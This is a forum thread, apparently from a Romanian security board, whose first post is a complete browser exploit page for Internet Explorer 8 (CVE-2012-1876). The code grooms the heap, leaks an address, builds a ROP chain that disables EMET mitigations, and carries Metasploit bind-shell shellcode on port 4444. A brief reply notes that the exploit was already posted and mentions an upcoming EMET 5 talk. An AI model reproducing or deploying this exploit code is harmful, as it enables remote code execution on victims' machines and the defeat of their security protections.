sensi Posted July 5, 2014 Report Posted July 5, 2014 (edited) <!--** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 4.1.X bypass** Offensive Security Research Team** http://www.offensive-security.com/vulndev/disarming-enhanced-mitigation-experience-toolkit-emet** Affected Software: Internet Explorer 8** Vulnerability: Fixed Col Span ID** CVE: CVE-2012-1876** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 4.1.X--><html><body><div id="evil"></div><table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table><script language='javascript'>function strtoint(str) { return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);}var free = "EEEE";while ( free.length < 500 ) free += free;var string1 = "AAAA";while ( string1.length < 500 ) string1 += string1;var string2 = "BBBB";while ( string2.length < 500 ) string2 += string2;var fr = new Array();var al = new Array();var bl = new Array();var div_container = document.getElementById("evil");div_container.style.cssText = "display:none";for (var i=0; i < 500; i+=2) { fr[i] = free.substring(0, (0x100-6)/2); al[i] = string1.substring(0, (0x100-6)/2); bl[i] = string2.substring(0, (0x100-6)/2); var obj = document.createElement("button"); div_container.appendChild(obj);}for (var i=200; i<500; i+=2 ) { fr[i] = null; CollectGarbage();}function heapspray(cbuttonlayout) { CollectGarbage(); var rop = cbuttonlayout + 4161; // RET var rop = rop.toString(16); var rop1 = rop.substring(4,8); var rop2 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 11360; // POP EBP var rop = rop.toString(16); var rop3 = rop.substring(4,8); var rop4 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 111675; // XCHG EAX,ESP var rop = rop.toString(16); var rop5 = rop.substring(4,8); var rop6 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 12377; // POP EBX var rop = rop.toString(16); var rop7 = rop.substring(4,8); var rop8 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 642768; // POP EDX var rop = rop.toString(16); var rop9 = rop.substring(4,8); var rop10 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 12201; // POP ECX --> Changed var rop = rop.toString(16); var rop11 = rop.substring(4,8); var rop12 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 5504544; // Writable location var rop = rop.toString(16); var writable1 = rop.substring(4,8); var writable2 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 12462; // POP EDI var rop = rop.toString(16); var rop13 = rop.substring(4,8); var rop14 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 12043; // POP ESI --> changed var rop = rop.toString(16); var rop15 = rop.substring(4,8); var rop16 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 63776; // JMP EAX var rop = rop.toString(16); var jmpeax1 = rop.substring(4,8); var jmpeax2 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 85751; // POP EAX var rop = rop.toString(16); var rop17 = rop.substring(4,8); var rop18 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 4936; // VirtualProtect() var rop = rop.toString(16); var vp1 = rop.substring(4,8); var vp2 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX] var rop = rop.toString(16); var rop19 = rop.substring(4,8); var rop20 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 234657; // PUSHAD var rop = rop.toString(16); var rop21 = rop.substring(4,8); var rop22 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 408958; // PUSH ESP var rop = rop.toString(16); var rop23 = rop.substring(4,8); var rop24 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 2228408; // POP ECX var rop = rop.toString(16); var rop25 = rop.substring(4,8); var rop26 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 1586172; // POP EAX var rop = rop.toString(16); var rop27 = rop.substring(4,8); var rop28 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX] var rop = rop.toString(16); var rop29 = rop.substring(4,8); var rop30 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 1884912; // PUSH EAX var rop = rop.toString(16); var rop31 = rop.substring(4,8); var rop32 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 2140694; // ADD EAX,ECX var rop = rop.toString(16); var rop33 = rop.substring(4,8); var rop34 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX var rop = rop.toString(16); var rop35 = rop.substring(4,8); var rop36 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 5036248; // ADD ESP,0C var rop = rop.toString(16); var rop37 = rop.substring(4,8); var rop38 = rop.substring(0,4); // } RET var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW var getmodulew = getmodulew.toString(16); var getmodulew1 = getmodulew.substring(4,8); var getmodulew2 = getmodulew.substring(0,4); // } RET var getprocaddr = cbuttonlayout + 4836; // GetProcAddress var getprocaddr = getprocaddr.toString(16); var getprocaddr1 = getprocaddr.substring(4,8); var getprocaddr2 = getprocaddr.substring(0,4); // } RET var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING shellcode+= unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING shellcode+= unescape("%u4141%u4141"); // PADDING shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN // EMET disable part 0x01 // Implement the Tachyon detection grid to overcome the Romulan cloaking device. shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN shellcode+= unescape("%u101C%u076d"); // EMET string shellcode+= unescape("%ue220%u0007"); // EMET offset shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN shellcode+= unescape("%u0000%u0000"); // Zero out ECX shellcode+= unescape("%u"+rop35+"%u"+rop36); // MOV DWORD PTR [EAX],ECX # RETN shellcode+= unescape("%u"+rop37+"%u"+rop38); // ADD ESP,0C # RETN shellcode+= "EMET"; // EMET string shellcode+= unescape("%u0000%u0000"); // EMET string // EMET disable part 0x01 end // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain) shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP shellcode+= unescape("%u1024%u0000"); // Size 0x00001024 shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX shellcode+= unescape("%u0040%u0000"); // 0x00000040 shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2); // JMP EAX shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect() shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX] shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP shellcode+= unescape("%u9090%u9090"); // NOPs // EMET disable part 0x02 // Execute the Corbomite bluff to disarm EAF shellcode+= unescape("%uc0b8%u6d10"); shellcode+= unescape("%u8b07%u8b00"); shellcode+= unescape("%u6800%u10c8"); shellcode+= unescape("%u076d%ud0ff"); shellcode+= unescape("%ud468%u6d10"); shellcode+= unescape("%u5007%uc4b8"); shellcode+= unescape("%u6d10%u8b07"); shellcode+= unescape("%u8b00%uff00"); shellcode+= unescape("%u8bd0%u81f0"); shellcode+= unescape("%uccec%u0002"); shellcode+= unescape("%uc700%u2404"); shellcode+= unescape("%u0010%u0001"); shellcode+= unescape("%ufc8b%uccb9"); shellcode+= unescape("%u0002%u8300"); shellcode+= unescape("%u04c7%ue983"); shellcode+= unescape("%u3304%uf3c0"); shellcode+= unescape("%u54aa%ufe6a"); shellcode+= unescape("%ud6ff%u9090"); shellcode+= unescape("%u9090%u9090"); // NOPs shellcode+= unescape("%u9090%u29eb"); // NOPs shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW shellcode+= unescape("%u"+getprocaddr1+"%u"+getprocaddr2); // GetProcAddress shellcode+= "NTDLL"; shellcode+= unescape("%u0000"); shellcode+= unescape("%u744e%u6553"); // NtSetContextThread shellcode+= unescape("%u4374%u6e6f"); shellcode+= unescape("%u6574%u7478"); shellcode+= unescape("%u6854%u6572"); shellcode+= unescape("%u6461%u0000"); shellcode+= unescape("%u9090%u9090"); // NOPs shellcode+= unescape("%u9090%u9090"); // NOPs // EMET disable part 0x02 end // Bind shellcode on 4444 // msf > generate -t js_le // windows/shell_bind_tcp - 342 bytes // http://www.metasploit.com // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript= // I would keep the shellcode the same size for better reliability shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" + "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" + "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" + "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" + "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" + "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" + "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" + "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" + "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" + "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" + "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" + "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" + "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" + "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" + "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" + "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" + "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" + "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" + "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" + "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" + "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" + "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" + "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" + "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" + "%u006a%uff53%u41d5"); // Total spray should be 1000 var padding = unescape("%u9090"); while (padding.length < 1000) padding = padding + padding; var padding = padding.substr(0, 1000 - shellcode.length); shellcode+= padding; while (shellcode.length < 100000) shellcode = shellcode + shellcode; var onemeg = shellcode.substr(0, 64*1024/2); for (i=0; i<14; i++) { onemeg += shellcode.substr(0, 64*1024/2); } onemeg += shellcode.substr(0, (64*1024/2)-(38/2)); var spray = new Array(); for (i=0; i<100; i++) { spray[i] = onemeg.substr(0, onemeg.length); }}function leak(){ var leak_col = document.getElementById("132"); leak_col.width = "41"; leak_col.span = "19";}function get_leak() { var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13)); str_addr = str_addr - 1410704; var hex = str_addr.toString(16); //alert(hex); setTimeout(function(){heapspray(str_addr)}, 50);}function trigger_overflow(){ var evil_col = document.getElementById("132"); evil_col.width = "1245880"; evil_col.span = "44";}setTimeout(function(){leak()}, 400);setTimeout(function(){get_leak()},450);setTimeout(function(){trigger_overflow()}, 700);</script></body></html>source// Da ai dreptate, nu vazusem... defapt nici titlul nu-i chiar sugestiv. Rog un moderator sa mute/stearga topicul. Edited July 6, 2014 by sensi Quote
Flubber Posted July 6, 2014 Report Posted July 6, 2014 a fost deja postat aici asteptam acum blackhat pt. emet 5, poate o sa ofere un insight si catre public odata ce se termina cursul lor acolo ( si sper eu pe IE mai recent, nu dinozaurul de 8 ) Quote